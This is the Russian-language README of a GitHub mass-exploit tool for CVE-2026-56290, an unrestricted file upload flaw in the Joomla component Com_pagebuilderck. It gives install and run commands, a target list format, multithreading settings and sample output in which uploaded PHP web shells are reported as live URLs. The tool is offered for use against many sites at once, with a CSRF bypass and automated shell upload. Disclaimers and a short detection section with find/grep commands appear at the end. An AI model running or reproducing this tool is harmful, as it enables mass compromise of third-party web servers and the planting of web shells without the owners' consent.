
CVE-2026-56290 - Массовый эксплойт для компонента Joomla Com_pagebuilderck (Неограниченная загрузка файлов → RCE). Многопоточный, автоматический обход CSRF, загрузчик PHP-шелла.
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности.
- Несанкционированный доступ к компьютерным системам незаконен
- Используйте этот инструмент только на системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение
- Автор не несет ответственности за неправомерное использование или ущерб, причиненный этим инструментом
- Используя этот инструмент, вы соглашаетесь соблюдать все применимые законы и нормативные акты
Дополнительное предупреждение вы можете увидеть в отказе от ответственности на обложке Jenderal92. Вы можете проверить это ЗДЕСЬ !!!
CVE-2026-56290 — это инструмент для массовой эксплуатации уязвимости в компоненте Joomla Com_pagebuilderck. Эта уязвимость позволяет удаленным злоумышленникам загружать произвольные PHP-файлы через механизм неограниченной загрузки, что приводит к удаленному выполнению кода (RCE).
| Атрибут | Значение |
|---|
| CVE ID | CVE-2026-56290 |
| Компонент | Com_pagebuilderck |
| Платформа | Joomla! CMS |
| Тип | Неограниченная загрузка файлов (RCE) |
| Оценка CVSS | 9.8 (Критический) |
/media/com_pagebuilderck/gfonts/reslt.txtPython 2.7
pip (Установщик пакетов Python)
pip install requests colorama
git clone https://github.com/Jenderal92/CVE-2026-56290.git
cd CVE-2026-56290
pip install -r requirements.txt
python CVE-2026-56290.py targets.txt
Создайте файл targets.txt с одним URL на строку:
https://example1.com
http://example2.com/joomla
https://example3.com:8080
# Комментарии игнорируются
· Вывод в консоль: Ход выполнения и результаты в реальном времени · reslt.txt: Содержит все URL уязвимых шеллов
$ python CVE-2026-56290.py targets.txt
[+] CVE-2026-56290 - Com_pagebuilderck Mass Exploit
[+] Потоков: 15
[+] Таймаут: 10с
[+] Выходной файл: reslt.txt
[+] Загружено 100 целей из файла
[*] Запуск пула с 15 процессами...
[1] В очереди: https://example1.com
[2] В очереди: https://example2.com
...
[1] ✓✓✓ УЯЗВИМ: https://example1.com/media/com_pagebuilderck/gfonts/shell_abc123.php
Вы можете изменить эти переменные в скрипте:
THREADS = 15 # Количество одновременных рабочих потоков
TIMEOUT = 10 # Таймаут запроса в секундах
USER_AGENT = "..." # Пользовательская строка User-Agent
OUTPUT_FILE = "reslt.txt" # Имя выходного файла
Если вы используете сайт на Joomla с Com_pagebuilderck:
/media/com_pagebuilderck/gfonts/ на наличие подозрительных файловОбратите внимание на следующие признаки эксплуатации:
# Подозрительные файлы в
/media/com_pagebuilderck/gfonts/*.php
/media/com_pagebuilderck/gfonts/*.phtml
/media/com_pagebuilderck/gfonts/*.phar
# Подозрительные запросы
/index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&[token]=1
# Поиск подозрительных PHP-файлов в каталоге media
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -name "*.php" -type f
# Проверка последних изменений
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -type f -mtime -7
# Поиск подозрительных имен файлов (случайные строки)
ls -la /path/to/joomla/media/com_pagebuilderck/gfonts/ | grep -E '[a-z0-9]{8,}\.(php|phtml|phar)'
Данное программное обеспечение предоставляется «КАК ЕСТЬ», без каких-либо гарантий. Автор не несет ответственности за любое незаконное или неэтичное использование этого инструмента. Всегда получайте соответствующее разрешение перед тестированием любой системы.
· Исследователям безопасности, которые обнаружили и сообщили об уязвимости CVE-2026-56290 · Сообществу Joomla за поддержку CMS
Помните: с большой силой приходит большая ответственность. Используйте этот инструмент этично и законно.